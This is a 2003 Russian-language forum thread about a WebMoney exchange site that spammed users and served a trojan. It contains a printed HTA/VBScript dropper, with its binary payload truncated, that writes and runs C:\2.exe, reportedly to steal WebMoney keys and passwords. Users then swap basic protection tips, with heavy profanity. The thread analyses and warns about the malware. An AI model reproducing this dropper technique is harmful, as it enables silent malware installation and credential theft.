В связи с устареванием топик заархивирован

В связи с устареванием топик заархивирован

Последний раз редактировалось: Tekken (16/05/19 в 14:10), всего редактировалось 1 раз

мне спам от них пришел ..
Достойная альтернатива фетхарду , эквадору и тд ...

бля сходил туды - стоит какая то ебань -- вклад ВМ под проценты ..
Уроды короче...

Мне тоже спам пришел Суки, имхо с форума адресов надыбали

вот придурки wmexchanges.com, тоже спамом завалили. ладно ещё спам, но трояны то зачем вешать...

Ну эт ты зря эту ссылку запостил.

На странице такая хрень:

Код:

<object DATA="order_form03.php">

Итак, обращаемся:

Код:

GET /order_form03.php HTTP/1.1 HOST: wmexchanges.com

Получаем:

Код:

HTTP/1.1 200 OK Date: Fri, 17 Oct 2003 00:57:14 GMT Server: Apache/1.3.27 (Unix) mod_log_bytes/0.3 FrontPage/5.0.2.2510 PHP/4.3.2 mod_ssl/2.8.14 OpenSSL/0.9.7b X-Powered-By: PHP/4.3.2 Content-disposition: inline; filename=1.htm Сontent-Type: application/hta <SCRIPT language=vbs> self.MoveTo 6000,6000 set a=CreateObject("Scripting.FileSystemObject") set b=a.CreateTextFile("C:\2.exe",1) b.write(H("4D5A50000200000004000F00FFFF0000B80000000000000040001A000000")) //.. //Дальше охиренно длинный кусок BASE64-кода в этом стиле //.. b.Write(H("")) b.Close Set shell = CreateObject("WScript.Shell") shell.run("C:\2.exe") Function H(H1) Dim H2 Dim H3:H2="" For H3=1 To Len(H1) Step 2 H2=H2&Chr("&h"&Mid(H1,H3,2)) Next H=H2 End Function </SCRIPT>

Троянец банальный, при нормальном уровне безопасности и пропатченном ИЕ запуститься не должен.
Скорей всего пиздит что-то связанное в кипером.

ЗЫ: стрелять таких надо.

Пиздец котенку - отосрался.

В течении бизнес-дня его прикроют нах.
Чмо ебаное. Ебаное чмо.

Не ругайся ты так... а то на всех таких уродов не хватит выражений...

Троян - пионерит ключи и кошельки к киперу вместе с паролями %)
И вместе с этим - еще все полезное, что сможет утянуть %)

Банальный вопрос, но все же.
Как лучше (и чем) защищатся от троянов и как выявить его присутствие в системе?

Pentarh писал:

Ну эт ты зря эту ссылку запостил.

правда чтоль?
если ты не заметил, то ссылка брокен, плюс еще предупреждение отписано.

Цитата:

Банальный вопрос, но все же. Как лучше (и чем) защищатся от троянов и как выявить его присутствие в системе?

Патчи всякие вовремя ставить.

Tekken писал:

Pentarh писал: Ну эт ты зря эту ссылку запостил. правда чтоль? если ты не заметил, то ссылка брокен, плюс еще предупреждение отписано.

Хе-хе. Ну дык я ж постарался :-)

Прикрыли шарманку уже.

Man писал:

Банальный вопрос, но все же. Как лучше (и чем) защищатся от троянов и как выявить его присутствие в системе?

Лично я наизусть знаю список процессов, которые должны быть.
Все что появляется лишнее, я тщательно изучаю и при этом смотрю в реестровые записи автозагрузки.
От троянов лучшая защита - правильно настроенный файрвол. Я юзаю At-Guard. У меня кстати коллекция уже троянов. Файрвол вовремя предупреждает. Потом я вычисляю трояна, убираю из системы и добавляю в коллекцию :-)

AVP, Symantec Antivirus - все хирня. Систему тормозят ПЦ. Уж лучше ручками :-)

Разве что в таких ситуациях, когда вирь поражает системные файлы исполняемые - тогда уж можно и антивирем пройтись.

Pentarh писал:

Tekken писал: Pentarh писал: Ну эт ты зря эту ссылку запостил. правда чтоль? если ты не заметил, то ссылка брокен, плюс еще предупреждение отписано. Хе-хе. Ну дык я ж постарался :-) Прикрыли шарманку уже.

я про то что вместо http, написано hххp.
а что постарался, так молодец. еще один пиксель к твоей пиписке, эт я про рейтинг

Не, нихера. Еще пока не прикрыли.

ipowerweb.com - мутная какая-то контора. Их тоже стрелять наверно надо
Для того, чтобы написать письмо саппорту, мне пришлось зарегистрироваться (!), просмотреть кучу пиздатых "BEST OFFERS", поискать категорию вопроса, который я хотел задать (так и ненашел абуз никаких), ввести вопрос, нажать кнопку Сабмит.
Потом мне было предложено поискать мой вопрос в FAQ и если его там нету, тогда нажать еще раз Сабмит и подтвердить мой вопрос.

Вот бля уроды!

Обычные дебилы - уроды.. И хостинг себе выбрали соответсвующий..
Надо сказать у них несколько разных урлов - и постоянно делают новые когда у них закрывают старые..

Man писал:

Банальный вопрос, но все же. Как лучше (и чем) защищатся от троянов и как выявить его присутствие в системе?

Я так понимаю тут нужно комплексно подходить. [1] Апдейты регулярные виндуза, раз в неделю обязательно. Хотя бы проверить, нет ли чего нового. [2] Фаервол хороший, смотреть кто куда ломится и с какого перепуга. [3] Монитор антивирусный, что файлы при открытии проверяет, типа касперского. [4] Собственно антивирус, чтобы вычищать то, что проскочило мимо монитора. [5] Ну и ad-aware на всякий пожарный, тоже находит много всякого барахла.

На самом деле такое впечатление, что всякой дряни стало на порядок больше в инете. И чем дальше тем хуже становится

Ну я лично большой противник антивирусов - уж конкретно они тачку гальмуют все эти мониторы и т.п. Юзаю только в крайних случаях.

А вообще лучшая защита - уметь отличать плохое от хорошего.
Я например трояны за версту чую :-)